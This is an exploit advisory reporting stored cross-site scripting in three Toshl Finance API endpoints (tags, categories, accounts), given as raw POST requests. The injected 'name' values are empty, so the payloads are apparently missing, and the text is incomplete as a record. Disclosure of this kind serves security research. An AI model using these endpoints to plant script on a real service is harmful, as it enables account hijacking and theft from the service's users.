# Exploit Title: Toshl Finance Web Application - Multiple Areas of Stored Cross-Site Scripting (XSS) # Date: 6/24/16 # Exploit Author: Brett DeWall # Exploit Author Twitter: @xbadbiddyx # Exploit Author Blog: http://xbadbiddyx.tumblr.com # Vendor Homepage: https://toshl.com/app/ # Version: Latest commit # Contacted Vendor Date: 6/18/16 ### Vulnerable Area #1 Request POST /api/tags?immediate_update=true HTTP/1.1 Host: toshl.com {"type":"expense","name":"","category":"51076972"} ### Vulnerable Area #2 Request POST /api/categories HTTP/1.1 Host: toshl.com {"type":"income","name":""} ### Vulnerable Area #3 POST /api/accounts HTTP/1.1 Host: toshl.com {"name":"","currency":{"code":"USD","rate":1,"fixed":false},"initial_balance":1000}